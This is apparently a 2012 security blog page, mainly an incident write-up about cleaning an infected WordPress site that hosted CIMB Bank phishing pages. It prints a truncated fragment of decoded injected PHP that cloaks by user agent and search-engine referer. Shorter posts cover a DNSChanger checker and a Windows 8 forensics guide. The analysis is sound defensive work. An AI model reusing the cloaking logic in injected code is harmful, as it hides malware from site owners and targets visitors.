Saturday, May 26, 2012

Parasite PHP script on victim website (

While helping victim website removing phishing site and doing patching I just found interesting malicious code inside the Wordpress based website. The case begin when the victim site hosted a phishing site. The phishing web founded on several directory which is disguised as CIMB Bank. While updating with new Wordpress version and all the plugins I just notice there is something wrong with the size of index.php files. I also installed the SIG (Silent Is Golden) plugins to hide all the directory traversal. It will install an empty index.php file.

After finishing all the basic patches, I just notice the 'empty' index.php file is not empty. Open up the index.php file and found this:

This is definitely not good. Lets decode the base64 encoded eval() part and see what we got.
if (!$qazplm){
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"") or stristr($referer,"") or stristr($referer,"") or stristr($referer,"") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"") or stristr($referer,"") or stristr($referer,"")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

The decoded code above shows that any matched URL from referer will be notify the '' via referer. The script has been set not to run on IE7. The suspicious file that doing this infection is coming from the Wordpress plugins script which is from '/wp-admin/plugins.php'. Let's take a look.

Well, just what I expected. There is an infection script on the beginning of file and if we take a look at the bottom file there is a huge base64 encoded string with eval(). After decoding a while seems like all the encoded script are the same and randomly put the code within the plugins.php. This cause the plugins.php generate many error.

Since the infection has been affected on all .php files with the same scripts, I decided to replace all Wordpress file with the new one. After that, there is still left some infected script especially on their custom theme. Need a special script to crawl and find all the infected file. Thanks to for writing a nice PHP script to detect PHP web shell which is also can be use in this case. After run the script found more than 100 PHP file still got infected. Remove some unused plugins and themes and some have to fix it manually.

The domain name '' seem already down. I can't go further analysis but there is other guys already analyzed what was happened. As I noticed that is is not only affected on Wordpress but also other popular CMS like Joomla, Drupan and so on.!topic/webmasters/SuUGJWwbqeA

Thursday, May 17, 2012

CyberSecurity Malaysia launch its own DNSChanger detection page

CSM just release another free services for checking DNSChanger trojan existence. By just simply visiting the following website you will be notice whether your current PC/notebook is infected with DNSChanger malware or not.

If your PC is clean you will be notice as 'Congratulation!' with green background otherwise you will be detected as red background. They also provided a free removal tools for Mac and Windows users.

Thursday, May 3, 2012

Windows 8 Forensics Guide

Just reading and share something before I'm going to sleep. It is basic understanding about next generation of Windows called Windows 8. Pretty good for advanced user to known little bit more 'in-depth' how Windows folder, registry, users and system variables, and so on works and located. For malware analyst its probably good to known for future malware infection cases.